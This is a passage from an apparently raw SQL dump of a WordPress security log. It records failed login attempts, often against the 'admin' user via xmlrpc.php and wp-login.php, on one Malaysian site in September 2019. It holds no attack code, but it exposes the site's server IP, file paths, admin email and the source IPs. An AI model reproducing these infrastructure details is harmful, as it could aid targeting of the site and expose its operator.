empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"185.52.2.165\";s:11:\"REMOTE_PORT\";s:5:\"24853\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9Wr@BXE2JRepjOtvm0vgAAABU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568626352.0618\";s:12:\"REQUEST_TIME\";s:10:\"1568626352\";}}','notice','2019-09-16 09:32:33','2019-09-16 09:32:32',18256728,19556232,'https://bintara.com.my/xmlrpc.php',1,0,'185.52.2.165'),(24043,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.100.42\";s:11:\"REMOTE_PORT\";s:5:\"57788\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9W8Aavjo3v4tJT4rvt6AAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568626416.961\";s:12:\"REQUEST_TIME\";s:10:\"1568626416\";}}','notice','2019-09-16 09:33:38','2019-09-16 09:33:37',17739400,19230904,'https://bintara.com.my/wp-login.php',1,0,'104.236.100.42'),(24044,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.236.100.42\";s:11:\"REMOTE_PORT\";s:5:\"58280\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9W9GCCaIOMm5l5jJE9TQAAAQY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568626420.5069\";s:12:\"REQUEST_TIME\";s:10:\"1568626420\";}}','notice','2019-09-16 09:33:41','2019-09-16 09:33:40',18255464,19555872,'https://bintara.com.my/xmlrpc.php',1,0,'104.236.100.42'),(24045,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"107.161.24.34\";s:11:\"REMOTE_PORT\";s:5:\"43418\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9Yt71rBLb0GV3O7mTbmgAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568626871.2658\";s:12:\"REQUEST_TIME\";s:10:\"1568626871\";}}','notice','2019-09-16 09:41:12','2019-09-16 09:41:11',17737680,19228776,'https://bintara.com.my/wp-login.php',1,0,'107.161.24.34'),(24046,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"107.161.24.34\";s:11:\"REMOTE_PORT\";s:5:\"44898\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9YuQavjo3v4tJT4rvvKQAAAIM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568626874.7347\";s:12:\"REQUEST_TIME\";s:10:\"1568626874\";}}','notice','2019-09-16 09:41:16','2019-09-16 09:41:15',18254744,19553776,'https://bintara.com.my/xmlrpc.php',1,0,'107.161.24.34'),(24047,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"49116\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9Z9L1rBLb0GV3O7mTbxAAAAEg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568627188.8243\";s:12:\"REQUEST_TIME\";s:10:\"1568627188\";}}','notice','2019-09-16 09:46:30','2019-09-16 09:46:29',17744392,19231368,'https://bintara.com.my/wp-login.php',1,0,'178.128.90.9'),(24048,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"49116\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9Z9L1rBLb0GV3O7mTbxAAAAEg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568627188.8243\";s:12:\"REQUEST_TIME\";s:10:\"1568627188\";}}','notice','2019-09-16 09:46:30','2019-09-16 09:46:29',17905456,19231368,'https://bintara.com.my/wp-login.php',1,0,'178.128.90.9'),(24049,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"49450\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9Z92CCaIOMm5l5jJE9oAAAARU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568627191.2957\";s:12:\"REQUEST_TIME\";s:10:\"1568627191\";}}','notice','2019-09-16 09:46:33','2019-09-16 09:46:31',18256728,19556232,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.90.9'),(24387,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.182.56.72\";s:11:\"REMOTE_PORT\";s:5:\"33452\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBfbLIp53uPsY7BKArNsgAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568694124.2471\";s:12:\"REQUEST_TIME\";s:10:\"1568694124\";}}','notice','2019-09-17 04:22:05','2019-09-17 04:22:04',17740384,19229560,'https://bintara.com.my/wp-login.php',1,0,'185.182.56.72'),(23746,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 